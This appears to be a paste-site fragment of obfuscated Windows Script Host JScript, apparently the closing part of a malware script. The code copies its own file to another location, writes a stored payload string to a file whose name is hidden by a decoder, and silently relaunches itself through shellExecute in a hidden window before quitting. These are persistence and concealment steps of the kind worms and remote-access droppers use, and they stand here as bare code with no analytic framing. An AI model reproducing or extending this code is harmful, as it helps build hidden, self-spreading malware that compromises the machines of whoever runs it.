- b$jscomp$0.copyFile(WScript.ScriptFullName, bbz$jscomp$0, true);
- if (tff$jscomp$0 != "") {
- try {
- otf$jscomp$0 = b$jscomp$0.openTextFile(bbs$jscomp$0 + "\\" + ha$jscomp$0(g$jscomp$0 + "a03"), 2, 1);
- otf$jscomp$0.write(tff$jscomp$0);
- otf$jscomp$0.close();
- } catch (e) {
- }
- }
- ru$jscomp$0.shellExecute("wscript.exe", '"' + WScript.ScriptFullName + '" ' + ha$jscomp$0(g$jscomp$0 + Math.random()), "", "", 0);
- WScript.quit();
- }
- })();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement